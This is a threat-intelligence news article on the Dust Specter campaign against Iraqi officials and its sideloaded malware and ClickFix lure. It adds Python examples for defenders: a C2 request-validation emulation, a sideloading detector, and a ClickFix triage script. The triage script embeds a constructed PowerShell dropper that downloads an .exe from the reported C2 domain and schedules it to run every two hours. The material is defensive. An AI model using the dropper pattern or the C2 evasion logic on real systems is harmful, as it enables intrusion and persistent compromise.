
Dust Specter Targets Iraqi Officials With New SPLITDROP and GHOSTFORM Malware

Ravie Lakshmanan | Mar 05, 2026 | Malware / Threat Intelligence

A suspected Iran-nexus threat actor has been linked to a campaign that targets government officials in Iraq, impersonating the country's Ministry of Foreign Affairs to deliver a previously undocumented set of malware families.

Zscaler ThreatLabz, which observed the activity in January 2026, tracks the cluster under the name Dust Specter. The attack, which takes the form of two distinct infection chains, culminates in the deployment of malware families tracked as SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM.

“Dust Specter used randomly generated URI paths in command-and-control (C2) communications, with checksum values appended to the URI paths to ensure that these requests came from a genuine infected system,” said security researcher Sudeep Singh. “The C2 server also used geofencing techniques and user agent authentication.”
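To make the URI-checksum, geofencing and User-Agent checks concrete, here is an added Python emulation of a C2 server's request validation. It is not Zscaler's code or the actor's: the report does not disclose the checksum construction, the path length, the expected User-Agent or the geofence, so all of those (a keyed SHA-256 prefix, a 12-character path, the UA string, an Iraq-only allow list) are assumptions chosen for illustration. What it shows is why a scanner or sandbox that replays a captured beacon path from the wrong network, with the wrong User-Agent, or with a guessed path gets nothing back from the server.

```python
import hashlib
import secrets
import string
from typing import Optional

# Assumed parameters for the emulation (none of these are published in the report).
SHARED_SECRET = b"example-shared-secret"  # assumed: a secret baked into the implant
EXPECTED_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ExampleImplant/1.0"  # assumed
ALLOWED_COUNTRIES = {"IQ"}  # assumed geofence: only clients geolocated to Iraq
PATH_LEN = 12  # assumed length of the random path segment
ALPHABET = string.ascii_lowercase + string.digits


def checksum(random_part: str) -> str:
    """Keyed checksum over the random path segment (assumed construction).

    Because the secret is needed to compute it, a scanner that enumerates or
    guesses paths cannot produce a suffix the server will accept.
    """
    digest = hashlib.sha256(SHARED_SECRET + random_part.encode()).hexdigest()
    return digest[:8]


def make_beacon_uri(random_part: Optional[str] = None) -> str:
    """Implant side: build /<random-segment>-<checksum>."""
    if random_part is None:
        random_part = "".join(secrets.choice(ALPHABET) for _ in range(PATH_LEN))
    return f"/{random_part}-{checksum(random_part)}"


def validate_request(path: str, user_agent: str, client_country: str) -> str:
    """Server side: return 'ok' or the first reason the request is rejected.

    The order mirrors the cheapest checks first: geofence, then User-Agent,
    then path shape, then the keyed checksum.
    """
    if client_country not in ALLOWED_COUNTRIES:
        return "rejected: geofence"
    if user_agent != EXPECTED_UA:
        return "rejected: user-agent"
    body = path.lstrip("/")
    random_part, sep, suffix = body.rpartition("-")
    if not sep or len(random_part) != PATH_LEN or not all(c in ALPHABET for c in random_part):
        return "rejected: malformed path"
    if suffix != checksum(random_part):
        return "rejected: checksum"
    return "ok"


if __name__ == "__main__":
    uri = make_beacon_uri()
    print("implant beacon:", uri)
    print("genuine client:", validate_request(uri, EXPECTED_UA, "IQ"))
    print("sandbox replay from US:", validate_request(uri, EXPECTED_UA, "US"))
    print("curl from Iraq:", validate_request(uri, "curl/8.0", "IQ"))
    print("guessed path:", validate_request("/index.html", EXPECTED_UA, "IQ"))
```

For a defender the practical consequence is that a beacon URI harvested from a proxy log cannot simply be re-requested to fetch the next-stage payload; the replay has to come from the right geography with the exact User-Agent, and even then a reused path may be single-use on the server side.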

A notable aspect of the campaign is its use of compromised infrastructure belonging to the Iraqi government to host the malicious payloads, alongside execution-delay tactics intended to keep the activity under the radar.

The first attack chain begins with a password-protected RAR archive containing a .NET dropper called SPLITDROP, which acts as a conduit for TWINTASK, the worker module, and TWINTALK, the C2 orchestrator.

TWINTASK is a malicious DLL (“libvlc.dll”) that is sideloaded by the legitimate “vlc.exe” binary. It polls a file (“C:\ProgramData\PolGuid\in.txt”) every 15 seconds for new commands and executes them using PowerShell, including commands that establish persistence on the host through Windows Registry changes. Command output and errors are written to a separate text file (“C:\ProgramData\PolGuid\out.txt”).

TWINTALK, for its part, is a DLL (“hostfxr.dll”) sideloaded by another legitimate binary present in the extracted archive (“WingetUI.exe”). Its main purpose is to contact the C2 server for new commands, coordinate tasks with TWINTASK, and return the results to the server. It supports writing the command body from the C2 response to “in.txt,” as well as downloading and uploading files.

“The C2 orchestrator works in conjunction with a predefined worker module to implement a file-based polling mechanism for tasking,” Singh said. “When executed, TWINTALK enters a beaconing loop and delays execution for a random interval before polling the C2 server for new commands.”
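The sideloading pairs and the file-based tasking loop described above leave three observable traces on an endpoint: a known DLL name loaded by vlc.exe or WingetUI.exe from an unexpected, unsigned location; one of those media or package-manager binaries spawning PowerShell; and writes to the in.txt/out.txt tasking files under C:\ProgramData\PolGuid. The following Python is an added detection sketch, not Zscaler's code, that runs those three rules over constructed Sysmon-style events. The telemetry lines, the key=value format and the trusted-directory prefixes are assumptions made for the example; the file and DLL names come from the report.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style telemetry (EventID 7 = image load, 1 = process
# create, 11 = file create). These are not real logs from the campaign; the
# paths use the artefacts named in the report: vlc.exe/libvlc.dll,
# WingetUI.exe/hostfxr.dll and C:\ProgramData\PolGuid\in.txt / out.txt.
SAMPLE_EVENTS = [
    r"EventID=7 Image=C:\Users\u\Downloads\Invite\vlc.exe ImageLoaded=C:\Users\u\Downloads\Invite\libvlc.dll Signed=false",
    r"EventID=7 Image=C:\Program Files\VideoLAN\VLC\vlc.exe ImageLoaded=C:\Program Files\VideoLAN\VLC\libvlc.dll Signed=true",
    r"EventID=7 Image=C:\Users\u\Downloads\Invite\WingetUI.exe ImageLoaded=C:\Users\u\Downloads\Invite\hostfxr.dll Signed=false",
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Users\u\Downloads\Invite\vlc.exe CommandLine=powershell -nop -w hidden -c whoami",
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine=powershell",
    r"EventID=11 Image=C:\Users\u\Downloads\Invite\WingetUI.exe TargetFilename=C:\ProgramData\PolGuid\in.txt",
]

# key=value pairs whose values may contain spaces (e.g. "Program Files");
# a value ends where the next " key=" begins or at end of line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

SIDELOAD_DLLS = {"libvlc.dll", "hostfxr.dll"}          # from the report
SIDELOAD_HOSTS = {"vlc.exe", "wingetui.exe"}           # from the report
TRUSTED_PREFIXES = (r"c:\program files", r"c:\windows")  # assumed install roots
TASKING_FILES = {r"c:\programdata\polguid\in.txt", r"c:\programdata\polguid\out.txt"}


def parse_event(line: str) -> Dict[str, str]:
    return {key: value for key, value in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_name, artefact) for every event that matches one of the rules."""
    findings: List[Tuple[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        if eid == "7":
            loaded = ev.get("ImageLoaded", "")
            if basename(loaded) in SIDELOAD_DLLS and basename(image) in SIDELOAD_HOSTS:
                untrusted_dir = not loaded.lower().startswith(TRUSTED_PREFIXES)
                unsigned = ev.get("Signed", "").lower() == "false"
                if untrusted_dir or unsigned:
                    findings.append(("dll_sideload", loaded))
        elif eid == "1":
            parent = ev.get("ParentImage", "")
            if basename(image) in {"powershell.exe", "pwsh.exe"} and basename(parent) in SIDELOAD_HOSTS:
                findings.append(("lolbin_spawns_powershell", parent))
        elif eid == "11":
            target = ev.get("TargetFilename", "")
            if target.lower() in TASKING_FILES:
                findings.append(("tasking_file_artifact", target))
    return findings


if __name__ == "__main__":
    for rule, artefact in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} {artefact}")
```

The second sample line (VLC loading its own libvlc.dll from Program Files, signed) is the control case: the rule keys on DLL name plus host process, then only fires when the load path or signature is off, which keeps a normal VLC install quiet. The 15-second polling cadence noted above is a further signal a file-monitoring rule could add (repeated reads of in.txt by the same process) but is not modelled here.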

The second attack chain represents an evolution of the first, consolidating all TWINTASK and TWINTALK functionality into a single binary called GHOSTFORM. It uses an in-memory PowerShell script to execute commands received from the C2 server, eliminating the need to write tasking artifacts to disk.

That is not the only difference between the two attack chains. Some GHOSTFORM binaries were found to embed a hard-coded Google Forms URL that is automatically opened in the default web browser when the malware is executed. The form contains Arabic-language content and is presented as an official survey from the Ministry of Foreign Affairs of Iraq.

Zscaler’s analysis of the TWINTALK and GHOSTFORM source code also revealed the presence of placeholder values, emojis, and Unicode text, suggesting that artificial intelligence (AI) generation tools may have been used to aid in the development of the malware.

In addition, the C2 domain associated with TWINTALK, “meetingapp[.]site,” is said to have been used by Dust Specter in a July 2025 campaign to host a fake Cisco Webex meeting invitation page that instructs users to copy, paste, and run a PowerShell script in order to join the meeting. These instructions mirror a tactic widely seen in ClickFix-style social engineering attacks.

The PowerShell script, for its part, creates a directory on the host and attempts to download an unspecified payload from the same domain, saving it as an executable within the newly created directory. It also creates a scheduled task to launch the binary every two hours.
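The behaviour just described (make a directory, fetch a payload from the lure domain, save it as an .exe, register a task that fires every two hours) is a compact ClickFix dropper pattern that can be triaged directly from PowerShell ScriptBlock logging (Event ID 4104) or from the text a user pasted. The following Python is an added example, not Zscaler's tooling and not the actor's script: the two sample scripts are constructed for the example, the indicator regexes are my own heuristics, and only the defanged domain meetingapp[.]site is taken from the report. It normalises defanged text before matching, which matters when the script arrives via a report or ticket rather than from telemetry.

```python
import re
from typing import Dict, List

# Constructed ScriptBlock text modelled on the reported behaviour: create a
# directory, download from the lure domain, save as .exe, run it every 2 hours.
# This is NOT the actor's script; the filenames and task name are invented.
CLICKFIX_SAMPLE = r'''
$d = "$env:ProgramData\Example"
New-Item -ItemType Directory -Force -Path $d | Out-Null
Invoke-WebRequest -Uri "https://meetingapp[.]site/join/update" -OutFile "$d\update.exe"
schtasks /create /tn "ExampleUpdater" /tr "$d\update.exe" /sc hourly /mo 2 /f
'''

# Constructed benign script: downloads a CSV into TEMP and summarises it.
BENIGN_SAMPLE = r'''
Invoke-WebRequest -Uri "https://example.com/report.csv" -OutFile "$env:TEMP\report.csv"
Import-Csv "$env:TEMP\report.csv" | Measure-Object
'''

# Heuristic indicators (assumed, not from the report) covering each step the
# article attributes to the script, plus the reported C2 domain.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "creates_directory": re.compile(r"New-Item\s+[^\n]*-ItemType\s+Directory|\bmkdir\s", re.I),
    "downloads_executable": re.compile(
        r"\b(Invoke-WebRequest|iwr|curl|wget|DownloadFile|Start-BitsTransfer)\b[^\n]*\.exe\b", re.I),
    "writes_to_programdata": re.compile(r"ProgramData", re.I),
    "scheduled_task_every_2h": re.compile(
        r"schtasks[^\n]*/sc\s+hourly[^\n]*/mo\s+2\b"
        r"|New-ScheduledTaskTrigger[^\n]*-RepetitionInterval[^\n]*-Hours\s+2\b", re.I),
    "known_c2_domain": re.compile(r"meetingapp\.site", re.I),  # from the report (refanged)
}


def defang_normalize(text: str) -> str:
    """Undo common defanging so indicators match text copied from reports."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def triage(script: str) -> List[str]:
    """Return the names of indicators present in the script, in INDICATORS order."""
    text = defang_normalize(script)
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


def verdict(script: str) -> str:
    hits = triage(script)
    if "known_c2_domain" in hits or len(hits) >= 3:
        return "likely_clickfix_dropper"
    if hits:
        return "review"
    return "benign"


if __name__ == "__main__":
    for label, sample in (("clickfix", CLICKFIX_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, verdict(sample), triage(sample))
```

The domain indicator is the only high-confidence atom; everything else is behavioural and will also fire on some legitimate installers, which is why the verdict requires either the domain or three co-occurring steps before calling the script a dropper.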

Dust Specter’s connection to Iran is based on the fact that Iranian hacking groups have a history of developing custom .NET backdoors to achieve their goals. The use of compromised Iraqi government infrastructure has also been observed in previous campaigns linked to threat actors such as OilRig (aka APT34).

“This campaign, attributed with medium to high confidence to Dust Specter, likely targeted government officials using social engineering lures posing as the Iraqi Ministry of Foreign Affairs,” Zscaler said. “The activity also reflects broader trends, including ClickFix-style techniques and the increasing use of AI in malware development.”
